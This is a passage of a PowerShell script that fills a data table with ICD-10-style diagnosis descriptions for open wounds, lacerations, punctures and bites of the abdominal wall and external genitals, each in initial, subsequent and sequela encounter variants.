cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, periumbilic region without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, periumbilic region without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, periumbilic region without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, periumbilic region without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, unspecified quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, unspecified quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, unspecified quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, unspecified quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, unspecified quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, unspecified quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, right upper quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, right upper quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, right upper quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, right upper quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, right upper quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, right upper quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, left upper quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, left upper quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, left upper quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, left upper quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, left upper quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, left upper quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, epigastric region without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, epigastric region without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, epigastric region without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, epigastric region without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, epigastric region without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, epigastric region without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, right lower quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, right lower quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, right lower quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, right lower quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, right lower quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, right lower quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, left lower quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, left lower quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, left lower quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, left lower quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, left lower quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, left lower quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, periumbilic region without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, periumbilic region without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, periumbilic region without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, periumbilic region without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, periumbilic region without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, periumbilic region without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, unspecified quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, unspecified quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, unspecified quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, unspecified quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall with foreign body, unspecified quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall with foreign body, unspecified quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, right upper quadrant without penetration into peritoneal cavity","Open bite of abdominal wall, right upper quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, right upper quadrant without penetration into peritoneal cavity","Open bite of abdominal wall, right upper quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, right upper quadrant without penetration into peritoneal cavity","Open bite of abdominal wall, right upper quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, left upper quadrant without penetration into peritoneal cavity","Open bite of abdominal wall, left upper quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, left upper quadrant without penetration into peritoneal cavity","Open bite of abdominal wall, left upper quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, left upper quadrant without penetration into peritoneal cavity","Open bite of abdominal wall, left upper quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, epigastric region without penetration into peritoneal cavity","Open bite of abdominal wall, epigastric region without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, epigastric region without penetration into peritoneal cavity","Open bite of abdominal wall, epigastric region without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, epigastric region without penetration into peritoneal cavity","Open bite of abdominal wall, epigastric region without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, right lower quadrant without penetration into peritoneal cavity","Open bite of abdominal wall, right lower quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, right lower quadrant without penetration into peritoneal cavity","Open bite of abdominal wall, right lower quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, right lower quadrant without penetration into peritoneal cavity","Open bite of abdominal wall, right lower quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, left lower quadrant without penetration into peritoneal cavity","Open bite of abdominal wall, left lower quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, left lower quadrant without penetration into peritoneal cavity","Open bite of abdominal wall, left lower quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, left lower quadrant without penetration into peritoneal cavity","Open bite of abdominal wall, left lower quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, periumbilic region without penetration into peritoneal cavity","Open bite of abdominal wall, periumbilic region without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, periumbilic region without penetration into peritoneal cavity","Open bite of abdominal wall, periumbilic region without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, periumbilic region without penetration into peritoneal cavity","Open bite of abdominal wall, periumbilic region without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, unspecified quadrant without penetration into peritoneal cavity","Open bite of abdominal wall, unspecified quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, unspecified quadrant without penetration into peritoneal cavity","Open bite of abdominal wall, unspecified quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of abdominal wall, unspecified quadrant without penetration into peritoneal cavity","Open bite of abdominal wall, unspecified quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of penis","Unspecified open wound of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of penis","Unspecified open wound of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of penis","Unspecified open wound of penis, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of penis","Laceration without foreign body of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of penis","Laceration without foreign body of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of penis","Laceration without foreign body of penis, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of penis","Laceration with foreign body of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of penis","Laceration with foreign body of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of penis","Laceration with foreign body of penis, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of penis","Puncture wound without foreign body of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of penis","Puncture wound without foreign body of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of penis","Puncture wound without foreign body of penis, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of penis","Puncture wound with foreign body of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of penis","Puncture wound with foreign body of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of penis","Puncture wound with foreign body of penis, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of penis","Open bite of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of penis","Open bite of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of penis","Open bite of penis, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of scrotum and testes","Unspecified open wound of scrotum and testes, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of scrotum and testes","Unspecified open wound of scrotum and testes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of scrotum and testes","Unspecified open wound of scrotum and testes, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of scrotum and testes","Laceration without foreign body of scrotum and testes, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of scrotum and testes","Laceration without foreign body of scrotum and testes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of scrotum and testes","Laceration without foreign body of scrotum and testes, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of scrotum and testes","Laceration with foreign body of scrotum and testes, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of scrotum and testes","Laceration with foreign body of scrotum and testes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of scrotum and testes","Laceration with foreign body of scrotum and testes, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of scrotum and testes","Puncture wound without foreign body of scrotum and testes, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of scrotum and testes","Puncture wound without foreign body of scrotum and testes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of scrotum and testes","Puncture wound without foreign body of scrotum and testes, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of scrotum and testes","Puncture wound with foreign body of scrotum and testes, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of scrotum and testes","Puncture wound with foreign body of scrotum and testes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of scrotum and testes","Puncture wound with foreign body of scrotum and testes, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of scrotum and testes","Open bite of scrotum and testes, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of scrotum and testes","Open bite of scrotum and testes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of scrotum and testes","Open bite of scrotum and testes, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of vagina and vulva","Unspecified open wound of vagina and vulva, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of vagina and vulva","Unspecified open wound of vagina and vulva, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of vagina and vulva","Unspecified open wound of vagina and vulva, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of vagina and vulva","Laceration without foreign body of vagina and vulva, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of vagina and vulva","Laceration without foreign body of vagina and vulva, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of vagina and vulva","Laceration without foreign body of vagina and vulva, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of vagina and vulva","Laceration with foreign body of vagina and vulva, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of vagina and vulva","Laceration with foreign body of vagina and vulva, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of vagina and vulva","Laceration with foreign body of vagina and vulva, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of vagina and vulva","Puncture wound without foreign body of vagina and vulva, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of vagina and vulva","Puncture wound without foreign body of vagina and vulva, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of vagina and vulva","Puncture wound without foreign body of vagina and vulva, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of vagina and vulva","Puncture wound with foreign body of vagina and vulva, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of vagina and vulva","Puncture wound with foreign body of vagina and vulva, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of vagina and vulva","Puncture wound with foreign body of vagina and vulva, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of vagina and vulva","Open bite of vagina and vulva, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of vagina and vulva","Open bite of vagina and vulva, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of vagina and vulva","Open bite of vagina and vulva, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified external genital organs, male","Unspecified open wound of unspecified external genital organs, male, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified external genital organs, male","Unspecified open wound of unspecified external genital organs, male, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified external genital organs, male","Unspecified open wound of unspecified external genital organs, male, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified external genital organs, female","Unspecified open wound of unspecified external genital organs, female, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified external genital organs, female","Unspecified open wound of unspecified external genital organs, female, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified external genital organs, female","Unspecified open wound of unspecified external genital organs, female, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified external genital organs, male","Laceration without foreign body of unspecified external genital organs, male, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified external genital organs, male","Laceration without foreign body of unspecified external genital organs, male, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified external genital organs, male","Laceration without foreign body of unspecified external genital organs, male, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified external genital organs, female","Laceration without foreign body of unspecified external genital organs, female, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified external genital organs, female","Laceration without foreign body of unspecified external genital organs, female, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified external genital organs, female","Laceration without foreign body of unspecified external genital organs, female, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified external genital organs, male","Laceration with foreign body of unspecified external genital organs, male, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified external genital organs, male","Laceration with foreign body of unspecified external genital organs, male, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified external genital organs, male","Laceration with foreign body of unspecified external genital organs, male, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified external genital organs, female","Laceration with foreign body of unspecified external genital organs, female, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified external genital organs, female","Laceration with foreign body of unspecified external genital organs, female, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified external genital organs, female","Laceration with foreign body of unspecified external genital organs, female, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified external genital organs, male","Puncture wound without foreign body of unspecified external genital organs, male, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified external genital organs, male","Puncture wound without foreign body of unspecified external genital organs, male, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified external genital organs, male","Puncture wound without foreign body of unspecified external genital organs, male, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified external genital organs, female","Puncture wound without foreign body of unspecified external genital organs, female, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified external genital organs, female","Puncture wound without foreign body of unspecified external genital organs, female, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified external genital organs, female","Puncture wound without foreign body of unspecified external genital organs, female, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified external genital organs, male","Puncture wound with foreign body of unspecified external genital organs, male, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified external genital organs, male","Puncture wound with foreign body of unspecified external genital organs, male, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified external genital organs, male","Puncture wound with foreign body of unspecified external genital organs, male, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified external genital organs, female","Puncture wound with foreign body of unspecified external genital organs, female, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified external genital organs, female","Puncture wound with foreign body of unspecified external genital organs, female, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified external genital organs, female","Puncture wound with foreign body of unspecified external genital organs, female, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified external genital organs, male","Open bite of unspecified external genital organs, male, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified external genital organs, male","Open bite of unspecified external genital organs, male, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified external genital organs, male","Open bite of unspecified external genital organs, male, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified external genital organs, female","Open bite of unspecified external genital organs, female, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified external genital organs, female","Open bite of unspecified external genital organs, female, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified external genital organs, female","Open bite of unspecified external genital organs, female, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, right upper quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, right upper quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, right upper quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, left upper quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, left upper quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, left upper quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, epigastric region with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, epigastric region with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, epigastric region with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, epigastric region with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, epigastric region with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, epigastric region with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, right lower quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, right lower quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, right lower quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, left lower quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, left lower quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, left lower quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, periumbilic region with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, periumbilic region with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, periumbilic region with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, periumbilic region with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, periumbilic region with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, periumbilic region with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Unspecified open wound of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, epigastric region with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, right lower quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, left lower quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, periumbilic region with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, unspecified quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, right upper quadrant with penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Laceration with foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of abdominal wall, left upper quadrant with penetration into peritoneal cavity","Laceration with foreign body of 